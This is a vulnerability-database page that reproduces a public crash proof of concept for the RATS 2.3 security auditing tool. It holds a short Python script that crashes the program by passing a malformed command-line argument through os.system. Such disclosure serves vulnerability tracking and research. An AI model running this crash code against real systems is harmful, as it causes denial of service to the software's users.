Lucene search
K

Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)

🗓️ 25 Apr 2016 00:00:00Reported by David SilveiroType 
zdt
 zdt
🔗 0day.today👁 21 Views

Rough Auditing Tool for Security (RATS) 2.3 crash PoC, Ubuntu 14.04 LTS, CVE 0 da

Code
# Exploit Title: RATS 2.3 Crash POC
# Date: 25th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day
 
from shlex import split
from os import system
 
 
def crash():
 
    try:
        com = ('rats --AAAA')
        return system(com)
     
    except:
        print("Is RATS installed?")
 
 
def main():
 
    print("Author:   David Silveiro        ")
    print("Website:  Xino.co.uk            ")
    print("Title:    POC RATS v2.3 Crash \n")
 
    crash()
 
 
if __name__ == "__main__":
    main()

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Apr 2016 00:00Current
7High risk
Vulners AI Score7
21